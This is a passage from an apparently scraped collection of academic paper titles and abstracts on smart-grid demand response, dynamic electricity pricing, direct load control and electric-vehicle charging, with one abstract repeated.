of Advanced Direct Load Control With Minimum Disruption paper_content: The advent of advanced sensor technology and the breakthroughs in telecommunication open up several new possibilities for demand-side management. More recently, there has been greater interest from utilities as well as system operators in utilizing load as a system resource through the application of new technologies. With the wider application of demand-side management, there is an increasing emphasis on control of loads with minimum disruption. This paper develops a new framework for designing as well as assessing such an advanced direct load control program with the objective of minimizing end-user discomfort and is formulated as an optimization problem. With a fairly general setup for demand-side management, a simulation-based framework is developed for the stochastic optimization problem. Next, using this framework, insights into the effect of different parameters and constraints in the model on load control are developed. --- paper_title: QoE-driven power scheduling in smart grid: architecture, strategy, and methodology paper_content: Smart grid is a new emerging technology which is able to intelligently control the power consumption via network. Therefore, the efficiency of the information exchange between the power suppliers (or control centers) and power customers is an important issue for smart grid. Moreover, the performance of the smart grid usually depends on the customer's satisfaction degree which belongs to the field of quality of experience. In this article, we propose a QoE-driven power scheduling in the context of smart grid from the perspectives of architecture, strategy, and methodology. Specifically, it takes into account the QoE requirement when designing the power allocation scheme. For obtaining the QoE requirement, we analyze the fluctuation of the power load and the impact of the transmission delay. In particular, the power allocation is formulated as an optimization problem that maximizes the social welfare of the system. Based on the given QoE model, an efficient power scheduling scheme is proposed by jointly considering the admission control and QoE expectation. Extensive simulation results indicate that the proposed scheme can efficiently allocate the power according to the dynamic QoE requirements in a practical smart grid system. --- paper_title: From Packet to Power Switching: Digital Direct Load Scheduling paper_content: At present, the power grid has tight control over its dispatchable generation capacity but a very coarse control on the demand. Energy consumers are shielded from making price-aware decisions, which degrades the efficiency of the market. This state of affairs tends to favor fossil fuel generation over renewable sources. Because of the technological difficulties of storing electric energy, the quest for mechanisms that would make the demand for electricity controllable on a day-to-day basis is gaining prominence. The goal of this paper is to provide one such mechanisms, which we call Digital Direct Load Scheduling (DDLS). DDLS is a direct load control mechanism in which we unbundle individual requests for energy and digitize them so that they can be automatically scheduled in a cellular architecture. Specifically, rather than storing energy or interrupting the job of appliances, we choose to hold requests for energy in queues and optimize the service time of individual appliances belonging to a broad class which we refer to as "deferrable loads". The function of each neighborhood scheduler is to optimize the time at which these appliances start to function. This process is intended to shape the aggregate load profile of the neighborhood so as to optimize an objective function which incorporates the spot price of energy, and also allows distributed energy resources to supply part of the generation dynamically. --- paper_title: From Packet to Power Switching: Digital Direct Load Scheduling paper_content: At present, the power grid has tight control over its dispatchable generation capacity but a very coarse control on the demand. Energy consumers are shielded from making price-aware decisions, which degrades the efficiency of the market. This state of affairs tends to favor fossil fuel generation over renewable sources. Because of the technological difficulties of storing electric energy, the quest for mechanisms that would make the demand for electricity controllable on a day-to-day basis is gaining prominence. The goal of this paper is to provide one such mechanisms, which we call Digital Direct Load Scheduling (DDLS). DDLS is a direct load control mechanism in which we unbundle individual requests for energy and digitize them so that they can be automatically scheduled in a cellular architecture. Specifically, rather than storing energy or interrupting the job of appliances, we choose to hold requests for energy in queues and optimize the service time of individual appliances belonging to a broad class which we refer to as "deferrable loads". The function of each neighborhood scheduler is to optimize the time at which these appliances start to function. This process is intended to shape the aggregate load profile of the neighborhood so as to optimize an objective function which incorporates the spot price of energy, and also allows distributed energy resources to supply part of the generation dynamically. --- paper_title: Load recognition for automated demand response in microgrids paper_content: Microgrids are well-suited for electrification of remote off-grid areas. This paper sketches the concept of a plug-and-play microgrid with a minimum of configuration effort needed for setup. When the load of such an off-grid microgrid grows over the generation capacity and energy storage is not sufficient, demand has to be reduced to prevent a blackout. In order to decide which loads are inessential and can be shedded, automated load recognition on the basis of measured power consumption profiles is needed. Two promising approaches from the area of speech recognition, Dynamic Time Warping and Hidden Markov Models, are compared for this application. It is found that a key feature to achieve good recognition efficiency is a careful selection of the features extracted from the measured power data. --- paper_title: Distributed demand response and user adaptation in smart grids paper_content: This paper proposes a distributed framework for demand response and user adaptation in smart grid networks. In particular, we borrow the concept of congestion pricing in Internet traffic control and show that pricing information is very useful to regulate user demand and hence balance network load. User preference is modeled as a willingness to pay parameter which can be seen as an indicator of differential quality of service. Both analysis and simulation results are presented to demonstrate the dynamics and convergence behavior of the algorithm. --- paper_title: An Optimal and Distributed Demand Response Strategy With Electric Vehicles in the Smart Grid paper_content: In this paper, we propose a new model of demand response management for the future smart grid that integrates plug-in electric vehicles and renewable distributed generators. A price scheme considering fluctuation cost is developed. We consider a market where users have the flexibility to sell back the energy generated from their distributed generators or the energy stored in their plug-in electric vehicles. A distributed optimization algorithm based on the alternating direction method of multipliers is developed to solve the optimization problem, in which consumers need to report their aggregated loads only to the utility company, thus ensuring their privacy. Consumers can update their loads scheduling simultaneously and locally to speed up the optimization computing. Using numerical examples, we show that the demand curve is flattened after the optimization, even though there are uncertainties in the model, thus reducing the cost paid by the utility company. The distributed algorithms are also shown to reduce the users' daily bills. --- paper_title: A novel charging-time control method for numerous EVs based on a period weighted prescheduling for power supply and demand balancing paper_content: To establish a sustainable energy supply system, renewable energy sources and low-carbon vehicles will have to become more widespread. However, it is often pointed out that the dissemination of these technologies will cause difficulties in balancing supply and demand in a power system, due to the fluctuation in the amounts of renewable energy generated and the fluctuation in the power demanded for numerous electric vehicles (EVs). The numerous EVs charging control seems to be difficult due to the difficulties in predicting EV trip behaviors, which vary depending on individual EV users. However, if we can control the total demand of numerous EVs, we can not only level their total load shape but also improve the supply-demand balancing capability of a power system to create new ancillary service businesses in the power market. This paper proposes a novel centralized EV-charging-control method to modify the total demand of EV charging by scheduling EV charging times. The proposed method is expected to be a powerful tool for a power aggregator (PAG), which will supply EV charging services to EV users and load leveling services to transmission system operators (TSOs) without inconveniencing EV users. The simulation showed that under the assumed EV trip patterns, the total charging demand of numerous EVs was successfully shaped so that the differences between watt-hours of the requirement and those of the controlled results were less than 4%. --- paper_title: Real-time vehicle-to-grid control algorithm under price uncertainty paper_content: The vehicle-to-grid (V2G) system enables energy flow from the electric vehicles (EVs) to the grid. The distributed power of the EVs can either be sold to the grid or be used to provide frequency regulation service when V2G is implemented. A V2G control algorithm is necessary to decide whether the EV should be charged, discharged, or provide frequency regulation service in each hour. The V2G control problem is further complicated by the price uncertainty, where the electricity price is determined dynamically every hour. In this paper, we study the real-time V2G control problem under price uncertainty. We model the electricity price as a Markov chain with unknown transition probabilities and formulate the problem as a Markov decision process (MDP). This model features implicit estimation of the impact of future electricity prices and current control operation on long-term profits. The Q-learning algorithm is then used to adapt the control operation to the hourly available price in order to maximize the profit for the EV owner during the whole parking time. We evaluate our proposed V2G control algorithm using both the simulated price and the actual price from PJM in 2010. Simulation results show that our proposed algorithm can work effectively in the real electricity market and it is able to increase the profit significantly compared with the conventional EV charging scheme. --- paper_title: Distributed algorithms for control of demand response and distributed energy resources paper_content: This paper proposes distributed algorithms for control and coordination of loads and distributed energy resources (DERs) in distribution networks. These algorithms are relevant for load curtailment control in demand response programs, and also for coordination of DERs for provision of ancillary services. Both the distributed load-curtailment and DER coordination problems can be cast as distributed resource allocation problems with constraints on resource capacity. We focus on linear iterative algorithms in which each resource j maintains a set of values that is updated to be a weighted linear combination of the resource's own previous set of values and the previous sets of values of its neighboring resources. This set of values can be used by each node to determine its own contribution to load curtailment or to resource request. --- paper_title: Demand-Response Management for Dependable Power Grids paper_content: The national electricity markets in Europe, Asia, and the Americas are evolving towards decentralized structures mainly based on renewable energies, essentially rooted in political decisions to counter the worldwide climate change. The increase of production based on renewable energy implies drastically higher volatility in available electric power. The problem has two challenging facets, namely grid stability, and economy of energy production and consumption. Stability is a priority concern, because reliable energy is a prerequisite for economic use of energy, whether or not renewable. This asks for improved and better coordinated diagnostic and prediction techniques, as well as orchestrated demand-side mechanisms to counter critical grid or market situations. This typically does not save energy per se, it alters the consumption characteristics: peaks are shifted or certain load patterns are avoided. Demand-response mechanisms are event-driven reactions based on, for instance, frequency deviations or end user online pricing. With demand-response, consumption is temporarily reduced or increased, possibly even with reducing the respective customer service levels (e.g. indoor climate). The incentive for customers to participate in such programs is usually of monetary nature. This chapter explains the different types of demand-response, and discusses established and emerging technologies, focusing on mechanisms that operate decentralized, and without collecting information centrally. We compare a set of approaches that take up and combine ideas from communication protocol design, taking a flaw in the current German grid regulations as our prime motivation. --- paper_title: Potential-Function Based Control of a Microgrid in Islanded and Grid-Connected Modes paper_content: This paper introduces the potential-function based method for secondary (as well as tertiary) control of a microgrid, in both islanded and grid-connected modes. A potential function is defined for each controllable unit of the microgrid such that the minimum of the potential function corresponds to the control goal. The dynamic set points are updated, using communication within the microgrid. The proposed potential function method is applied for the secondary voltage control of two microgrids with single and multiple feeders. Both islanded and grid-connected modes are investigated. The studies are conducted in the time-domain, using the PSCAD/EMTDC software environment. The study results demonstrate feasibility of the proposed potential function method and viability of the secondary voltage control method for a microgrid. --- paper_title: Decentralized Demand-Side Contribution to Primary Frequency Control paper_content: Frequency in large power systems is usually controlled by adjusting the production of generating units in response to changes in the load. As the amount of intermittent renewable generation increases and the proportion of flexible conventional generating units decreases, a contribution from the demand side to primary frequency control becomes technically and economically desirable. One of the reasons why this has not been done was the perceived difficulties in dealing with many small loads rather than a limited number of generating units. In particular, the cost and complexity associated with two-way communications between many loads and the control center appeared to be insurmountable obstacles. This paper argues that this two-way communication is not essential and that the demand can respond to the frequency error in a manner similar to the generators. Simulation results show that, using this approach, the demand side can make a significant and reliable contribution to primary frequency response while preserving the benefits that consumers derive from their supply of electric energy. --- paper_title: Demand response with functional buildings using simplified process models paper_content: Smart Grids ideally interconnect intelligent grid members. One big share of grid presence is with buildings. Flexible and grid-friendly buildings would improve grid management and are an important contribution to the integration of renewable energy sources. Classical buildings, however, are passive and not cooperative. This article describes how electro-thermal processes in buildings can be used for demand response and how such intelligent behavior can be enabled via communication technology. Experiments and simulations on typical mid-European buildings were done to estimate the potential time constants. --- paper_title: Design Considerations of a Centralized Load Controller Using Thermostatically Controlled Appliances for Continuous Regulation Reserves paper_content: This paper presents design considerations for a centralized load controller to control thermostatically controlled appliances (TCAs) for continuous regulation reserves (CRRs). The controller logics for setting up the baseline load, generating priority lists, issuing dispatch commands, and tuning the simplified forecaster model using measurement data are described. To study the impacts of different control parameter settings on control performance and device lifetimes, a system consisting of 1000 heating, ventilating, and air-conditioning (HVAC) units in their heating modes is modeled to provide a CRR 24 hours a day. Four cases are modeled to evaluate the impact of forecasting errors, minimum HVAC turn-off times, response delays, and consumer overrides. The results demonstrate that a centralized TCA load controller can provide robust, good quality CRRs with reduced communication needs for the two-way communication network and inexpensive load control devices. Most importantly, because the controller precisely controls the aggregated HVAC load shapes while maintaining load diversity, the controllable and measurable load services that it provides can be used for many other demand response applications, such as peak shaving, load shifting, and arbitrage. --- paper_title: A Distributed Demand Response Algorithm and Its Application to PHEV Charging in Smart Grids paper_content: This paper proposes a distributed framework for demand response and user adaptation in smart grid networks. In particular, we borrow the concept of congestion pricing in Internet traffic control and show that pricing information is very useful to regulate user demand and hence balance network load. User preference is modeled as a willingness to pay parameter which can be seen as an indicator of differential quality of service. Both analysis and simulation results are presented to demonstrate the dynamics and convergence behavior of the algorithm. Based on this algorithm, we then propose a novel charging method for plug-in hybrid electric vehicles (PHEVs) in a smart grid, where users or PHEVs can adapt their charging rates according to their preferences. Simulation results are presented to demonstrate the dynamic behavior of the charging algorithm and impact of different parameters on system performance. --- paper_title: Active Load Control in Islanded Microgrids Based on the Grid Voltage paper_content: In the islanded operating condition, the microgrid has to maintain the power balance independently of a main grid. Because of the specific characteristics of the microgrid, such as the resistive lines and the high degree of power-electronically interfaced generators, new power control methods for the generators have been introduced. For the active power control in this paper, a variant of the conventional droop P/f control strategy is used, namely the voltage-droop controller. However, because of the small size of the microgrid and the high share of renewables with an intermittent character, new means of flexibility in power balancing are required to ensure stable operation. Therefore, a novel active load control strategy is presented in this paper. The aim is to render a proof of concept for this control strategy in an islanded microgrid. The active load control is triggered by the microgrid voltage level. The latter is enabled by using the voltage-droop control strategy and its specific properties. It is concluded that the combination of the voltage-droop control strategy with the presented demand dispatch allows reliable power supply without interunit communication for the primary control, leads to a more efficient usage of the renewable energy and can even lead to an increased share of renewables in the islanded microgrid. --- paper_title: Influence of variable supply and load flexibility on Demand-Side Management paper_content: Demand-Side Management (DSM) refers to the shaping of the electrical load to improve the fit with the supply side [1]. One way to achieve this is to confront the user with a dynamic financial incentive to influence the demand. In previous work (see [2]) a crude reactive pricing algorithm has been shown to shave the peak of the aggregated load by over 25%. In this paper this approach is extended and evaluated in more detail. The algorithm is extended to cover scenarios where the supply is no longer fixed; its performance is investigated under varying conditions such as the percentage of the flexible load as well as the extent of the load's flexibility. The expected benefit of applying the algorithm to real world scenarios is predicted, allowing for an informed decision on whether or not to employ it in specific situations and under which pricing conditions. --- paper_title: Simulating integrated volt/var control and distributed demand response using GridSpice paper_content: This paper proposes VVCDDR, an integrated volt/var control scheme which also uses distributed demand response capacity on distribution networks to improve the reliability and efficiency of the distribution network. The paper uses a new simulation platform, GridSpice, to show that demand response resources can be used to maintain a flat and stable voltage profile over the feeder without increasing the allocation of voltage regulators and capacitor banks. The improved voltage profile allows for a safe reduction of voltage while ensuring that all loads remain within the standard acceptable voltage range. Previous studies have shown that a reduction of the load voltage translates into lower power consumption, a technique known as conservation voltage reduction (CVR). The simulation platform, GridSpice, built on top of Gridlab-D [11], is the first distribution simulator to consider volt/var control, demand response, and distribution automation in a single simulation. --- paper_title: Residential Demand Response model and impact on voltage profile and losses of an electric distribution network paper_content: This paper develops a model for Demand Response (DR) by utilizing consumer behavior modeling considering different scenarios and levels of consumer rationality. Consumer behavior modeling has been done by developing extensive demand-price elasticity matrices for different types of consumers. These price elasticity matrices (PEMs) are utilized to calculate the level of Demand Response for a given consumer considering a day-ahead real time pricing scenario. DR models are applied to the IEEE 8500-node test feeder which is a real world large radial distribution network. A comprehensive analysis has been performed on the effects of demand reduction and redistribution on system voltages and losses. Results show that considerable DR can boost in system voltage due for further demand curtailment through demand side management techniques like Volt/Var Control (VVC). --- paper_title: Demand side management program evaluation based on industrial and commercial field data paper_content: Demand Response is increasingly viewed as an important tool for use by the electric utility industry in meeting the growing demand for electricity. There are two basic categories of demand response options: time varying retail tariffs and incentive Demand Response Programs. Electricity Saudi Company (ESC) is applying the time varying retail tariffs program, which is not suitable according to the studied load curves captured from the industrial and commercial sectors. Different statistical studies on daily load curves for consumers connected to 22kV lines are classified. The load curve criteria used for classification is based on peak ratio and night ratio. The data considered here is a set of 120 annual load curves corresponding to the electric power consumption (the western area in the King Saudi Arabia (KSA)) of many clients in winter and some months in the summer (peak period). The study is based on real data from several Saudi customer sectors in many geographical areas with larger commercial and industrial customers. The study proved that the suitable Demand Response for the ESC is the incentive program. --- paper_title: Customer behavior based demand response model paper_content: An important benefit of demand response (DR) is avoided need to build power plants to serve heightened demand that occurs in just a few hours per year. There are two basic categories of DR options: price-based and incentive-based DR programs. In this paper, both categories of DR measures are modeled based on the demand-price elasticity concept. It has been shown that customers' reaction against implementing price-based or incentive-based DR programs are not similar, so that incentive-based programs have key impact on customer habit formation in response to DR programs. An improved DR model is developed which considers the customer's behavior. The proposed model extinguishes between customers' behavior with respect to electricity price change and his/her behavior against variation of incentive. The performance of the model has been justified by implementation on the IEEE reliability test system. --- paper_title: Impact of demand response contracts on load forecasting in a smart grid environment paper_content: Load forecasting is highly important for power system operation and planning. Demand response, as a valuable feature in smart grid, is growing dramatically as an effective demand management method. However, traditional load forecasting tools have limitations to reflect demand response customer behaviors into load predictions. The energy consumption by demand response customers is mostly guided by their signed contracts. Therefore, existing demand response contracts are reviewed in this study for both wholesale and retail markets. An illustrative example is provided to explore the impact of these contracts on load forecasting. A concept of proactive load forecasting considering contract types is then proposed and discussed for forecasting loads in a smart grid environment. --- paper_title: Behavior Modification paper_content: This article describes how retail electricity demand can be made price-responsive through either dynamic, time-based retail pricing or DR programs offered by utilities and/or regional ISOs. PRD can provide the crucial link between wholesale and retail electricity markets that is missing under traditional fixed retail rates. Parties generally agree on the need for greater PRD to improve the efficiency of wholesale power markets. There is no mechanical formula for determining how much consumers will alter their usage patterns for any given event. Price response varies considerably across customers and it tends to be greater for customers with relatively high usage levels. Consumers can choose to save money by reducing consumption during periods of high prices or "buy through" at prices that reflect wholesale market conditions. --- paper_title: Lessons learned from smart grid enabled pricing programs paper_content: Dynamic pricing is often considered an essential part of demand response programs, particularly when considering the advent of new consumer-facing technologies, which will eventually reshape the relationship between utility and consumer. This paper presents and analyzes case studies of several dynamic pricing programs, including different proposed rates, enabling technologies and incentives. Program successes are evaluated based on a combination of peak load reduction, customer bill impacts and customer satisfaction. An analysis of lessons learned is provided on how various factors can affect the success, scalability and applicability of smart grid demand response programs. --- paper_title: Residential response to critical-peak pricing of electricity: California evidence paper_content: This paper analyzes data from 483 households that took part in a critical-peak pricing (CPP) experiment between July and September 2004. Using a regression-based approach to quantify hourly baseline electric loads that would have occurred absent CPP events, we show a statistically significant average participant response in each hour. Average peak response estimates are provided for each of twelve experimental strata, by climate zone and building type. Results show that larger users respond more in both absolute and percentage terms, and customers in the coolest climate zone respond most as a percentage of their baseline load. Finally, an analysis involving the two different levels of critical-peak prices – $0.50/kWh and $0.68/kWh – indicates that households did not respond more to the higher CPP rate. --- paper_title: Modeling and prioritizing demand response programs in power markets paper_content: Abstract One of the responsibilities of power market regulator is setting rules for selecting and prioritizing demand response (DR) programs. There are many different alternatives of DR programs for improving load profile characteristics and achieving customers’ satisfaction. Regulator should find the optimal solution which reflects the perspectives of each DR stakeholder. Multi Attribute Decision Making (MADM) is a proper method for handling such optimization problems. In this paper, an extended responsive load economic model is developed. The model is based on price elasticity and customer benefit function. Prioritizing of DR programs can be realized by means of Technique for Order Preference by Similarity to Ideal Solution (TOPSIS) method. Considerations of ISO/utility/customer regarding the weighting of attributes are encountered by entropy method. An Analytical Hierarchy Process (AHP) is used for selecting the most effective DR program. Numerical studies are conducted on the load curve of the Iranian power grid in 2007. --- paper_title: The effect of utility time-varying pricing and load control strategies on residential summer peak electricity use: A review paper_content: Peak demand for electricity in North America is expected to grow, challenging electrical utilities to supply this demand in a cost-effective, reliable manner. Therefore, there is growing interest in strategies to reduce peak demand by eliminating electricity use, or shifting it to non-peak times. This strategy is commonly called "demand response". In households, common strategies are time-varying pricing, which charge more for energy use on peak, or direct load control, which allows utilities to curtail certain loads during high demand periods. We reviewed recent North American studies of these strategies. The data suggest that the most effective strategy is a critical peak price (CPP) program with enabling technology to automatically curtail loads on event days. There is little evidence that this causes substantial hardship for occupants, particularly if they have input into which loads are controlled and how, and have an override option. In such cases, a peak load reduction of at least 30% is a reasonable expectation. It might be possible to attain such load reductions without enabling technology by focusing on household types more likely to respond, and providing them with excellent support. A simple time-of-use (TOU) program can only expect to realise on-peak reductions of 5%. --- paper_title: Optimal Real-Time Pricing Algorithm Based on Utility Maximization for Smart Grid paper_content: In this paper, we consider a smart power infrastructure, where several subscribers share a common energy source. Each subscriber is equipped with an energy consumption controller (ECC) unit as part of its smart meter. Each smart meter is connected to not only the power grid but also a communication infrastructure such as a local area network. This allows two-way communication among smart meters. Considering the importance of energy pricing as an essential tool to develop efficient demand side management strategies, we propose a novel real-time pricing algorithm for the future smart grid. We focus on the interactions between the smart meters and the energy provider through the exchange of control messages which contain subscribers' energy consumption and the real-time price information. First, we analytically model the subscribers' preferences and their energy consumption patterns in form of carefully selected utility functions based on concepts from microeconomics. Second, we propose a distributed algorithm which automatically manages the interactions among the ECC units at the smart meters and the energy provider. The algorithm finds the optimal energy consumption levels for each subscriber to maximize the aggregate utility of all subscribers in the system in a fair and efficient fashion. Finally, we show that the energy provider can encourage some desirable consumption patterns among the subscribers by means of the proposed real-time pricing interactions. Simulation results confirm that the proposed distributed algorithm can potentially benefit both subscribers and the energy provider. --- paper_title: Demand response modeling considering Interruptible/Curtailable loads and capacity market programs paper_content: Recently, a massive focus has been made on demand response (DR) programs, aimed to electricity price reduction, transmission lines congestion resolving, security enhancement and improvement of market liquidity. Basically, demand response programs are divided into two main categories namely, incentive-based programs and time-based programs. The focus of this paper is on Interruptible/Curtailable service (I/C) and capacity market programs (CAP), which are incentive-based demand response programs including penalties for customers in case of no responding to load reduction. First, by using the concept of price elasticity of demand and customer benefit function, economic model of above mentioned programs is developed. The proposed model helps the independent system operator (ISO) to identify and employ relevant DR program which both improves the characteristics of the load curve and also be welcome by customers. To evaluate the performance of the model, simulation study has been conducted using the load curve of the peak day of the Iranian power system grid in 2007. In the numerical study section, the impact of these programs on load shape and load level, and benefit of customers as well as reduction of energy consumption are shown. In addition, by using strategy success indices the results of simulation studies for different scenarios are analyzed and investigated for determination of the scenarios priority. --- paper_title: Real-time pricing demand response in operations paper_content: Dynamic pricing schemes have been implemented in commercial and industrial application settings, and recently they are getting attention for application to residential customers. Time-of-use and critical-peak-pricing rates are in place in various regions and are being piloted in many more. These programs are proving themselves useful for balancing energy during peak periods; however, real-time (5 minute) pricing signals combined with automation in end-use systems have the potential to deliver even more benefits to operators and consumers. Besides system peak shaving, a real-time pricing system can contribute demand response based on the locational marginal price of electricity, reduce load in response to a generator outage, and respond to local distribution system capacity limiting situations. The US Department of Energy (DOE) is teaming with a mid-west electricity service provider to run a distribution feeder-based retail electricity market that negotiates with residential automation equipment and clears every 5 minutes, thus providing a signal for lowering or raising electric consumption based on operational objectives of economic efficiency and reliability. This paper outlines the capability of the real-time pricing system and the operational scenarios being tested as the system is rolled-out starting in the first half of 2012. --- paper_title: Demand response in electrical energy supply: An optimal real time pricing approach paper_content: In competitive electricity markets with deep concerns for the efficiency level, demand response programs gain considerable significance. As demand response levels have decreased after the introduction of competition in the power industry, new approaches are required to take full advantage of demand response opportunities. --- paper_title: The Value of Dynamic Pricing in Mass Markets paper_content: Abstract The simpler forms of dynamic pricing, in which prices vary only during extreme supply conditions, may capture many of the economic benefits of real-time pricing, and may be suitable for wide-scale deployment to mass-market consumers, for whom dynamic pricing options have largely been ignored. --- paper_title: Dynamic Pricing? Not So Fast! A Residential Consumer Perspective paper_content: With the installation of smart metering, will residential customers be moved to "dynamic" pricing? Some supporters of changing residential rate design from a fixed and stable rate structure believe customers should be required to take electric service with time-variant price signals. Not so fast, though! There are real implications associated with this strategy. --- paper_title: Coupon incentive-based demand response (CIDR) in smart grid paper_content: A new type of demand response (DR) program referred to as coupon incentive-based demand response (CIDR) is presented as an alternative to residential consumer demand response programs. Enabled by pervasive mobile communication capabilities and smart grid technologies, load serving entities (LSEs) could offer residential consumers coupon incentives to reduce power consumption in a given period of time, offsetting potential losses due to wholesale electricity price spikes. In contrast with real-time pricing or peak load pricing, CIDR program maintains simple flat retail rate structure on consumer side while providing effective voluntary-based incentives for DR. An iterative procedure is designed to realize the real-time interaction between the independent system operator, the LSEs and consumers. CIDR can increase the profit of the LSEs and achieve almost the same social welfare as under the real-time pricing scheme. CIDR is compatible with current flat retail rate pricing scheme so the implementation is straightforward. A numerical experiment demonstrates the potential benefits of CIDR programs. --- paper_title: The integration of Price Responsive Demand into Regional Transmission Organization (RTO) wholesale power markets and system operations paper_content: A number of states and utilities are pursuing demand response based on dynamic and time-differentiated retail prices and utility investments in Advanced Metering Infrastructure (AMI), often as part of Smart Grid initiatives. These developments could produce large amounts of Price Responsive Demand, demand that predictably responds to changes in wholesale prices. Price Responsive Demand could provide significant reliability and economic benefits. However, existing RTO tariffs present potential barriers to the development of Price Responsive Demand. Effectively integrating Price Responsive Demand into RTO markets and operations will require changes in demand forecasting, scarcity pricing reform, synchronization of scarcity pricing with capacity markets, tracking voluntary hedging by price responsive loads, and a non-discriminatory approach in curtailments in capacity emergencies. The article describes changes in RTO policies and systems needed incorporate Price Responsive Demand. --- paper_title: Demand Side Management: Demand Response, Intelligent Energy Systems, and Smart Loads paper_content: Energy management means to optimize one of the most complex and important technical creations that we know: the energy system. While there is plenty of experience in optimizing energy generation and distribution, it is the demand side that receives increasing attention by research and industry. Demand Side Management (DSM) is a portfolio of measures to improve the energy system at the side of consumption. It ranges from improving energy efficiency by using better materials, over smart energy tariffs with incentives for certain consumption patterns, up to sophisticated real-time control of distributed energy resources. This paper gives an overview and a taxonomy for DSM, analyzes the various types of DSM, and gives an outlook on the latest demonstration projects in this domain. --- paper_title: A probabilistic risk-based approach for spinning reserve provision using day-ahead demand response program paper_content: Spinning Reserve is one of the ancillary services which is essential to satisfy system security constraints when the power system faces with a contingency. In this paper, Day Ahead Demand Response Program as one of the incentive-based Demand Response programs is implemented as a source of spinning reserve. In this regard, certain number of demands are selected according to a sensitivity analysis, and simulated as virtual generation units. The reserve market is cleared for Spinning Reserve allocation considering a probabilistic technique. A comparison is performed between the absence and existence of Day Ahead Demand Response Program from both economical and reliability viewpoints. Numerical studies based on IEEE 57 bus test system is conducted for evaluation of the proposed method. --- paper_title: Optimal Scheduling of Demand Response Events for Electric Utilities paper_content: Electric utilities have been investigating methods to reduce peak power demand. Demand response (DR) is one such method which intends to reduce peak electricity demand. DR programs typically have limits on the number and timing of events that may be triggered for a selected group of customers. This paper presents a methodology for optimizing the scheduling of DR events for various DR programs. The proposed optimization mechanism establishes a policy that triggers DR events according to the criteria that govern the cost to the utility and based on probability distributions of exogenous information that is accessible to utilities a priori, for decision making. The policy determines a dynamic threshold for triggering events that optimizes the expected savings over the planning horizon. Case studies using real utility data show that our solutions are better than current industrial practices, and close to ex-post optimality. --- paper_title: Price it Right: Household Response to a Time-of-Use Electricity Pricing Experiment in Auckland, New Zealand paper_content: III ACKNOWLEDGEMENTS IV LIST OF TABLES IVII LIST OF FIGURES IVIII LIST OF EQUATIONS IX LIST OF PROBLEMS X --- paper_title: Smart grid technologies and applications for the industrial sector paper_content: Abstract Smart grids have become a topic of intensive research, development, and deployment across the world over the last few years. The engagement of consumer sectors—residential, commercial, and industrial—is widely acknowledged as crucial for the projected benefits of smart grids to be realized. Although the industrial sector has traditionally been involved in managing power use with what today would be considered smart grid technologies, these applications have mostly been one-of-a-kind, requiring substantial customization. Our objective in this article is to motivate greater interest in smart grid applications in industry. We provide an overview of smart grids and of electricity use in the industrial sector. Several smart grid technologies are outlined, and automated demand response is discussed in some detail. Case studies from aluminum processing, cement manufacturing, food processing, industrial cooling, and utility plants are reviewed. Future directions in interoperable standards, advances in automated demand response, energy use optimization, and more dynamic markets are discussed. --- paper_title: Flexible demand response programs modeling in competitive electricity markets paper_content: In recent years, extensive researches have been conducted on implementation of demand response programs (DRPs), aimed to electricity price reduction, transmission lines congestion resolving, security enhancement and improvement of market liquidity. Basically, DRPs are divided into two main categories namely, incentive-based programs (IBPs) and time-based rate programs (TBRPs). Mathematical modeling of these programs helps regulators and market policy makers to evaluate the impact of price responsive loads on the market and system operational conditions. In this paper, an economic model of price/incentive responsive loads is derived based on the concept of flexible price elasticity of demand and customer benefit function. The mathematical model for flexible price elasticity of demand is presented to calculate each of the demand response (DR) program’s elasticity based on the electricity price before and after implementing DRPs. In the proposed model, a demand ratio parameter has been introduced to determine the appropriate values of incentive and penalty in IBPs according to the level of demand. Furthermore, the importance of determining optimum participation level of customers in different DRPs has been investigated. The proposed model together with the strategy success index (SSI) has been applied to provide an opportunity for major players of the market, i.e. independent system operator (ISO), utilities and customers to select their favorite programs that satisfy their desires. In order to evaluate the performance of the proposed model, numerical studies are conducted on the Iranian interconnected network load profile on the annual peak day of the year 2007. --- paper_title: Residential Customer Response to Real-time Pricing: The Anaheim Critical Peak Pricing Experiment paper_content: This paper analyzes the results of a critical peak pricing (CPP) experiment involving 123 residential customers of the City of Anaheim Public Utilities (APU) over the period June 1, 2005 to October 14, 2005. Using a nonparametric condition mean estimation framework that allows for customer-specific fixed effects and day-of-sample fixed effects, I find that customers in the treatment group consumed an average of 12 percent less electricity during the peak hours of the day on CPP days than customers in the control group. There is also evidence that this reduction in consumption for customers in the treatment group relative to customers in the control group is larger on higher temperature CPP days. The impact of CPP events is confined to the peak periods of CPP days. Mean electricity consumption by customers in the treatment group is not significantly different from that of customers in the control group during the peak or off-peak periods of the day before or day after a CPP event. Much of the estimated consumption reduction of treatment consumers relative to control group consumers during peak periods of CPP days is due to reductions from a higher level of consumption by treatment group customers in non-CPP days. The consumption reductions paid rebates during CPP days are almost 7 times the reduction in consumption due to CPP events predicted by the treatment effects estimate, which provides strong evidence of an overly generous method for setting the reference level for peak period consumption relative to which customers are issued refunds during CPP days. The paper closes with a discussion of the challenges associated with implementing a CPP rate with a rebate mechanism as the default rate for residential customers. --- paper_title: Communication limitations in iterative real time pricing for power systems paper_content: Iterative, or negotiated, pricing mechanisms have been of interest for decades as a systematic means of operating electricity markets, and have more recently been proposed as a way of dealing with the increased diversity of responsive market participants brought about by smart grid technologies and the increasing share of intermittent energy sources. One possibility is for the market coordinator to communicate iteratively with market participants to determine energy prices, on a receding horizon basis. Until now, little work has been carried out on the practicalities of implementing such pricing mechanisms, and yet because a market outcome must be cleared in real time, adequate communication speed and reliability is essential. The authors present a model of lossy and delayed communication over a network for such a negotiated pricing mechanism, derived from practical consideration of message timing, collection strategies and security. The convergence of the algorithm to an optimal dispatch is shown to be quite robust to frequent communication failures and delays. Results are demonstrated for price negotiation over a 20-step time horizon on a densely-populated IEEE 39 bus network. --- paper_title: A day-ahead electricity pricing model based on smart metering and demand-side management paper_content: Several factors support more deployment of real-time pricing (RTP); including recent developments in the area of smart metering, regulators interest in promoting demand response programs and well-organized electricity markets. This paper first reviews time-based electricity pricing and the main barriers and issues to fully unleash benefits of RTP programs. Then, a day-ahead real-time pricing (DA-RTP) model is proposed, which addresses some of these issues. The proposed model can assist a retail energy provider and/or a distribution company (DISCO) to offer optimal DA hourly prices using smart metering. The real-time prices are determined through an optimization problem which seeks to maximize the electricity provider's profit, while considering consumers' benefit, minimum daily energy consumption, consumer response to posted electricity prices, and distribution network constraints. The numerical results associated with Ontario electricity tariffs indicate that instead of directly posting DA market prices to consumers, it would be better to calculate optimal prices which would yield higher benefit both for the energy provider and consumers. --- paper_title: Optimal energy consumption scheduling using 